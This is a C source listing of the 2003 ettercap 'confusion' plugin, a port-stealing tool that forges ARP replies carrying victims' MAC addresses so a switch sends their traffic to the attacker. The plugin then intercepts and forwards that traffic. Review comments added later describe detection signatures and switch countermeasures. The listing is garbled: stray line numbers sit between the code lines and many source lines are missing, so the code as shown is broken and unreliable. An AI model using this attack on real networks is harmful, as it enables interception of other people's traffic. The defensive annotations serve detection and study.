confusion -- ettercap plugin -- Port Stealer
Copyright (C) 2003 ALoR <alor@users.sourceforge.net>, NaGA <crwm@freemail.it>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
// #include <sys/time.h>
// #include <unistd.h>
#include "../../src/include/ec_main.h"
#include "../../src/include/ec_version.h"
#include "../../src/include/ec_plugins.h"
#include "../../src/include/ec_inet_structures.h"
#include "../../src/include/ec_inet.h"
#include "../../src/include/ec_inet_forge.h"
41
/* Plugin entry points; Plugin_Init() registers confusion_ops (see its definition below). */
int Plugin_Init(void *);
42
int Plugin_Fini(void *);
43
/* Looks a raw 6-byte MAC up in Host_In_LAN[]; defined below. */
int In_List(char *mac);
44
/* Plugin body; its address is stored in confusion_ops.hook_function. */
int confusion(void *dummy);
48
/*
 * Plugin descriptor passed to Plugin_Register() by Plugin_Init().
 * The initializer uses the obsolete GNU "field: value" form of designated
 * initializers.
 *
 * NOTE(review): the listing's line numbers jump 50 -> 53 and 54 -> 57, so
 * source lines 51-52 and 55-56 are missing here (presumably further fields
 * and the closing "};") -- confirm against the original file.
 */
struct plugin_ops confusion_ops = {
49
ettercap_version: VERSION,
50
plug_info: "Port Stealing",
53
/* HOOK_NONE: presumably means the plugin is not attached to a packet hook
 * and runs only when invoked -- confirm against ec_plugins.h. */
hook_point: HOOK_NONE,
54
hook_function: &confusion,
57
/*
 * Fixed link-layer addresses used by the code below.
 *   FakeMAC   00:fe:00:00:00:00  passed to Inet_Forge_arp() in the forged ARP
 *                                replies (target hardware address, judging by
 *                                the call sites -- confirm in ec_inet_forge.h)
 *   BroadMAC  ff:ff:ff:ff:ff:ff  Ethernet broadcast
 *   ArpMAC    all zeroes         hardware-address argument in the ARP requests
 *
 * Because FakeMAC is a constant, it is a stable value to match on when
 * looking for this tool's ARP traffic in a capture.
 *
 * NOTE(review): 0xfe and 0xff do not fit a signed char, so where plain char is
 * signed these initializers rely on an implementation-defined conversion.
 * The memcmp() comparisons still work because memcmp compares bytes as
 * unsigned char. The type is left alone because In_List() takes char *.
 */
char FakeMAC[6] = {0x00, 0xfe, 0x00, 0x00, 0x00, 0x00};
58
char BroadMAC[6]= {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};
59
char ArpMAC[6] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
61
//==================================
63
/*
 * Registers this plugin's descriptor (confusion_ops) with the host through
 * Plugin_Register() and hands the registration result back unchanged.
 *
 * params: opaque pointer forwarded as-is to Plugin_Register().
 */
int Plugin_Init(void *params)
{
   int registered = Plugin_Register(params, &confusion_ops);

   return registered;
}
68
/*
 * Counterpart of Plugin_Init() (presumably the unload entry point).
 * NOTE(review): the listing's line numbers jump 68 -> 73, so the body of this
 * function (source lines 69-72) is not present on this page.
 */
int Plugin_Fini(void *params)
73
// =================================
76
/*
 * Looks a raw 6-byte MAC address up in the collected host list.
 *
 * mac: pointer to 6 bytes, compared with memcmp().
 *
 * Returns -1 when mac is the broadcast address, or the index i (>= 1) of the
 * Host_In_LAN[] entry whose MAC matches.
 *
 * NOTE(review): the declarations of i and TempMAC (source lines 77-80) and
 * whatever follows the loop (lines 86-89, including the not-found return) are
 * missing from this listing. confusion() tests the result with "> 0" and
 * "== -1", so the not-found value is presumably 0 -- confirm.
 */
int In_List(char *mac)
81
/* Broadcast is reported separately from "found" and "not found". */
if (!memcmp(mac, BroadMAC, 6)) return -1;
82
/* The scan starts at index 1; entry 0 is never compared (presumably it is
 * the local host -- confirm). */
for (i=1; i< number_of_hosts_in_lan; i++)
84
/* The stored MAC is converted into TempMAC (apparently from its textual
 * form) so that 6 raw bytes can be compared. */
Inet_GetMACfromString(Host_In_LAN[i].mac, TempMAC);
85
if (!memcmp(TempMAC, mac, 6)) return (i);
90
/*
 * Plugin body (its address is stored in confusion_ops.hook_function).
 *
 * What the visible calls do: open a raw socket on Options.netiface, set the
 * interface promiscuous, and send forged ARP replies whose Ethernet source is
 * the MAC of a host from Host_In_LAN[] and whose Ethernet destination is this
 * machine's own MAC. Frames read from the socket whose destination MAC is in
 * the host list are re-sent after an ARP request for that host has been
 * answered, and the forged reply is then sent again.
 *
 * dummy: not referenced in any visible line.
 * Return value: not visible in this listing.
 *
 * NOTE(review): the listing's line numbers show many dropped source lines
 * (braces, loop headers, else/return lines), and the function's end is not on
 * this page. Nesting and control flow are therefore only partly visible and
 * the comments below hedge where they depend on the missing lines.
 *
 * Defensive notes: the forged frames carry constant values that can serve as
 * detection signatures. These are ARP sender/target IP 0x45454545
 * (69.69.69.69), ARP hardware address 00:fe:00:00:00:00, and an Ethernet
 * source address that is not the sending station's own. On the switch the
 * same activity appears as a host MAC moving between ports, which per-port
 * MAC limits or static MAC bindings are meant to prevent.
 */
int confusion(void *dummy)
92
int sock, i=0, j, len, MTU, to_sleep=1;
93
struct recv_packet pck, s_pck;
94
/* 0x45454545 is 69.69.69.69 in either byte order. */
u_long FakeIP=0x45454545, MyIP;
95
char MyMAC[6], SourceMAC[6], c[1]="";
96
ETH_header *eth, *rec_eth;
99
/* Requires at least one host besides entry 0. If the dropped lines return
 * here (presumably), this also keeps the later modulus
 * (number_of_hosts_in_lan - 1) from being zero -- confirm. */
if (number_of_hosts_in_lan < 2)
101
Plugin_Output("\nYou have to build Host-List to use confusion\n");
105
Plugin_Output("\nUse this plugin only on switched networks\nBe sure to keep the NIC in promisc mode\nPress return to stop\n");
107
/* NOTE(review): no check of sock, or of the Inet_Forge_packet() results
 * below, is visible before they are used. */
sock = Inet_OpenRawSock(Options.netiface);
108
Inet_GetIfaceInfo(Options.netiface, &MTU, MyMAC, &MyIP, NULL);
110
Inet_SetPromisc(Options.netiface);
112
/* Two buffers of MTU + ALIGN_ETH_TO_WORD bytes: pck receives frames, s_pck
 * holds forged ones. ".aligned" skips the ALIGN_ETH_TO_WORD leading bytes. */
pck.buf = Inet_Forge_packet( MTU + ALIGN_ETH_TO_WORD);
113
pck.aligned = pck.buf + ALIGN_ETH_TO_WORD;
115
s_pck.buf = Inet_Forge_packet( MTU + ALIGN_ETH_TO_WORD);
116
s_pck.aligned = s_pck.buf + ALIGN_ETH_TO_WORD;
118
Inet_SetNonBlock(sock);
122
/* Forged ARP reply for host i+1: Ethernet source = that host's MAC,
 * Ethernet destination = our own MAC, ARP fields filled from FakeIP/FakeMAC
 * (argument order inferred from the call sites -- confirm). */
Inet_GetMACfromString(Host_In_LAN[i+1].mac, SourceMAC);
123
Inet_Forge_ethernet(s_pck.aligned, SourceMAC, MyMAC, ETH_P_ARP);
124
Inet_Forge_arp( s_pck.aligned + ETH_HEADER, ARPOP_REPLY, SourceMAC, FakeIP, FakeMAC, FakeIP );
127
/* Keeps i in 0..number_of_hosts_in_lan-2, so i+1 stays within entries 1..n-1.
 * The increment of i is not on a visible line. */
i%=(number_of_hosts_in_lan - 1);
129
Inet_SendRawPacket(sock, s_pck.aligned, ETH_HEADER + ARP_HEADER);
132
/* Non-blocking poll for user input; the lines below are the stop path. */
if (Plugin_Input(c, 1, P_NONBLOCK))
134
/* On stop: send every listed host an ARP request from our real MAC and IP,
 * paced by Options.storm_delay. Presumably the hosts' answers let the switch
 * re-learn each host's real port -- confirm. */
for (i=1; i<number_of_hosts_in_lan; i++)
136
usleep(Options.storm_delay);
137
Inet_GetMACfromString(Host_In_LAN[i].mac, SourceMAC);
138
Inet_Forge_ethernet(s_pck.aligned, MyMAC, SourceMAC, ETH_P_ARP);
139
Inet_Forge_arp( s_pck.aligned + ETH_HEADER, ARPOP_REQUEST, MyMAC, MyIP, ArpMAC, inet_addr(Host_In_LAN[i].ip));
140
Inet_SendRawPacket(sock, s_pck.aligned, ETH_HEADER + ARP_HEADER);
144
/* Release both buffers and the socket; the return that presumably follows is
 * on a dropped line. */
Inet_Forge_packet_destroy( pck.buf );
145
Inet_Forge_packet_destroy( s_pck.buf );
146
Inet_CloseRawSock(sock);
150
/* Read at most MTU bytes of one frame; sock was set non-blocking above. */
len = Inet_GetRawPacket(sock, pck.aligned, MTU, NULL);
152
/* to_sleep starts at 1; no assignment that changes it is on a visible line. */
if (to_sleep) usleep(Options.storm_delay);
157
/* NOTE(review): no check that len covers an Ethernet header is visible before
 * eth is dereferenced. Source lines 153-156 are missing and may hold it. */
eth = (ETH_header *) pck.aligned;
159
/* A positive result means the frame's destination MAC belongs to listed host j. */
if ((j=In_List(eth->dest_mac)) > 0)
162
/* Second raw socket, used below to wait for the ARP answer.
 * NOTE(review): s_sock is not declared on any visible line and its result is
 * not visibly checked. */
s_sock = Inet_OpenRawSock(Options.netiface);
164
/* Broadcast ARP request for host j's IP, sent from our real MAC and IP. */
Inet_Forge_ethernet(s_pck.aligned, MyMAC, BroadMAC, ETH_P_ARP);
165
Inet_Forge_arp( s_pck.aligned + ETH_HEADER, ARPOP_REQUEST, MyMAC, MyIP, ArpMAC, inet_addr(Host_In_LAN[j].ip));
166
Inet_SendRawPacket(sock, s_pck.aligned, ETH_HEADER + ARP_HEADER);
168
/* In_List() returns -1 only for the broadcast address, so this rewrite applies
 * to frames whose source MAC is ff:ff:ff:ff:ff:ff. */
if (In_List(eth->source_mac)==-1)
169
memcpy(eth->source_mac, MyMAC, 6);
173
/* Wait for an ARP frame from the intercepted frame's real destination that is
 * addressed to us. The "do" line that opens this loop is missing.
 * NOTE(review): "continue" in a do/while jumps to the condition below, which
 * dereferences rec_eth. If the first read fails, no visible line has assigned
 * rec_eth yet. No timeout is visible either, so an unanswered request would
 * keep this loop running. */
if (Inet_GetRawPacket(s_sock, s_pck.aligned, MTU, NULL)<=0) continue;
174
rec_eth = (ETH_header *) s_pck.aligned;
175
} while (memcmp(rec_eth->source_mac, eth->dest_mac, 6) || memcmp(rec_eth->dest_mac, MyMAC, 6) || rec_eth->type != htons(ETH_P_ARP));
177
/* Re-send the captured frame with the length that was read. */
Inet_SendRawPacket(sock, pck.aligned, len);
179
Inet_CloseRawSock(s_sock);
181
/* Same forged ARP reply as earlier, now with eth->dest_mac as the Ethernet
 * source and ARP sender hardware address. */
Inet_Forge_ethernet(s_pck.aligned, eth->dest_mac, MyMAC, ETH_P_ARP);
182
Inet_Forge_arp( s_pck.aligned + ETH_HEADER, ARPOP_REPLY, eth->dest_mac, FakeIP, FakeMAC, FakeIP );
183
Inet_SendRawPacket(sock, s_pck.aligned, ETH_HEADER + ARP_HEADER);